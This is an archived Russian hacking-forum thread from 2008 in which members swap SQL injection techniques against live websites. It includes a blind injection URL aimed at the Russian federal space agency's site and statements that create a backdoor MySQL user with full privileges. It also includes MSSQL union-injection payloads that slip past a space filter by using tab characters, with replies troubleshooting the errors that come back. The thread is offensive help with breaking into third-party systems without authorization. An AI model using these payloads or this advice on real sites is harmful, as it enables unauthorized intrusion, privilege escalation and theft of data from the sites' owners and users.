HOME    FORUMS    MEMBERS    RECENT POSTS    LOG IN  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #1  
Старый 18.01.2008, 00:53
A2GIL
Познающий
Регистрация: 31.08.2007
Сообщений: 94
Провел на форуме:
422909

Репутация: 200
Отправить сообщение для A2GIL с помощью ICQ
По умолчанию

Ага, там стоит старая бд! Так что придется делать инъект в слепую...
select то работает:
http://www.federalspace.ru/DocDoSele.asp?DocID=46%20and%201=(select 1)--
 
Ответить с цитированием

  #2  
Старый 18.01.2008, 02:38
Welemir
Познающий
Регистрация: 10.01.2008
Сообщений: 58
Провел на форуме:
122329

Репутация: -2
По умолчанию

Собсна,вопрос: Как создать пользователя в бд с правами рута,если есть доступ к mysql.user?
 
Ответить с цитированием

  #3  
Старый 18.01.2008, 02:52
Spyder
Members of Antichat - Level 5
Регистрация: 09.10.2006
Сообщений: 1,698
Провел на форуме:
9098076

Репутация: 4303


По умолчанию

GRANT ALL PRIVILEGES ON *.* TO xek@% IDENTIFIED BY "пароль" WITH GRANT OPTION

или

INSERT INTO user VALUES("%","xek",PASSWORD("пароль"),"Y","Y", "Y","Y","Y","Y","Y","Y","Y","Y","Y","Y","Y","Y ");
 
Ответить с цитированием

  #4  
Старый 18.01.2008, 19:56
Welemir
Познающий
Регистрация: 10.01.2008
Сообщений: 58
Провел на форуме:
122329

Репутация: -2
По умолчанию

news.php?id=850+union+select+0,1,2,3,4,GRANT+ALL+P RIVILEGES+ON+*.*+TO+0xek@%+IDENTIFIED+BY+"паро ль"+WITH+GRANT+OPTION,6,7+from+mysql.user/*

таг?) откуда столько Y :PP
 
Ответить с цитированием

  #5  
Старый 18.01.2008, 20:11
blackybr
♠ ♦ ♣ ♥
Регистрация: 18.05.2006
Сообщений: 1,828
Провел на форуме:
8042357

Репутация: 3742


Отправить сообщение для blackybr с помощью ICQ Отправить сообщение для blackybr с помощью AIM Отправить сообщение для blackybr с помощью Yahoo
По умолчанию

не получится, если идет select ты никак не проведешь update или любой другой запрос кроме select и union select
__________________
Привет! Меня зовут Джордж, и я хотел бы рассказать вам про реинкарнацию (ц) 2x2
 
Ответить с цитированием

  #6  
Старый 19.01.2008, 17:42
PunkAss
Новичок
Регистрация: 19.01.2008
Сообщений: 9
Провел на форуме:
38435

Репутация: 5
Отправить сообщение для PunkAss с помощью ICQ
По умолчанию

Такая проблемка, в MSSQL обычная инъекция /rating.asp?sender=1'
sender при вводе фильтруется на пробел, плюс и дефис. Пробел заменил на таб %09, не знаю что с дефисом сделать. А без него не закомментить ненужную часть запроса,
там остаётся: ' order by blablabla
Другой комент /* выдаёт ошибку, # тоже не коментит =\

Например
Код:
sender=5'%09UNION%09SELECT%09*%09FROM%09INFORMATION_SCHEMA.TABLES%23
вызывает ошибку

Microsoft OLE DB Provider for SQL Server ошибка '80040e14'
Unclosed quotation mark after the character string ' group by sender'.

т.е. строка получается:
Код:
INFORMATION_SCHEMA.TABLES#' group by sender'.
Можно это как-то обойти?
 
Ответить с цитированием

  #7  
Старый 19.01.2008, 19:11
Macro
Постоянный
Регистрация: 11.11.2006
Сообщений: 595
Провел на форуме:
1845062

Репутация: 1079


По умолчанию

Можно. Просто сделать второй юнион
 
Ответить с цитированием

  #8  
Старый 19.01.2008, 19:50
PunkAss
Новичок
Регистрация: 19.01.2008
Сообщений: 9
Провел на форуме:
38435

Репутация: 5
Отправить сообщение для PunkAss с помощью ICQ
По умолчанию

Цитата:
Сообщение от Macro  
Можно. Просто сделать второй юнион
пробовал, но ещё бы я знал названия таблиц и колнок
 
Ответить с цитированием

  #9  
Старый 19.01.2008, 20:14
Macro
Постоянный
Регистрация: 11.11.2006
Сообщений: 595
Провел на форуме:
1845062

Репутация: 1079


По умолчанию

Цитата:
Сообщение от PunkAss  
пробовал, но ещё бы я знал названия таблиц и колнок
Ну information_schema должна быть.
Код:
script.asp?sender=1'%09union%09select%09*%09from%09information_schema.tables%09union%09select%09null
Что-то типа того
 
Ответить с цитированием

  #10  
Старый 19.01.2008, 22:24
PunkAss
Новичок
Регистрация: 19.01.2008
Сообщений: 9
Провел на форуме:
38435

Репутация: 5
Отправить сообщение для PunkAss с помощью ICQ
По умолчанию

Цитата:
Сообщение от Macro  
Что-то типа того
Блин, никак не канает
Узнал по ошибкам, что таблица rating, есть колонки ID и Sender.
Код:
=5'%09UNION%09SELECT%09sender%09FROM%09rating%09WHERE%09'1'='1
ошибка:
Column 'rating.Sender' is invalid in the select list because it is not contained in either an aggregate function or the GROUP BY clause.

т.е. запрос "SELECT sender FROM rating WHERE '1'='1' group by sender" не канает... хз какой там оригинальный запрос
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Ваши ламерские приколы (Ну когда только комп появился) PEPSICOLA Болталка 188 23.05.2010 10:05
Ваши любимые компьютерные игры PEPSICOLA Болталка 280 19.08.2009 00:01
Ваши телеги... F-IFTY Болталка 13 18.08.2009 18:22
Вопросы по Ipb 2.0 Voodoo_People Уязвимости CMS / форумов 26 15.02.2005 22:57



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ